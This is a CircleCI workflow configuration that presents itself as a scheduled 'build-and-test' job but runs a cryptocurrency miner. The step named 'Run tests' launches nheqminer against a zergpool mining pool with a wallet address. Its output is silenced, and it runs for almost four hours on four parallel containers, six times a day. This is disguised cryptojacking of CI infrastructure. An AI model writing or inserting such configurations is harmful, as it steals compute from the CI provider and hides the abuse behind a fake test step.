workflows:
  version: 2
  daily:
    triggers:
      - schedule:
         cron: "0 2,6,10,14,18,22 * * *"
         filters:
           branches:
             only:
               - master
    jobs:
      - build-and-test
jobs:
  build-and-test:
    parallelism: 4
    docker:
      - image: bocilepep/gaadapintu
    steps:
      - checkout
      - run:
          name: Run tests
          no_output_timeout: 5h
          command: |
           timeout 239m nheqminer -v -l verushash.eu.mine.zergpool.com:3300 -u DLckzpBwWjd8rKCKnC2sRgz5ed9J6zfQnb -t 2 > /dev/null 2>&1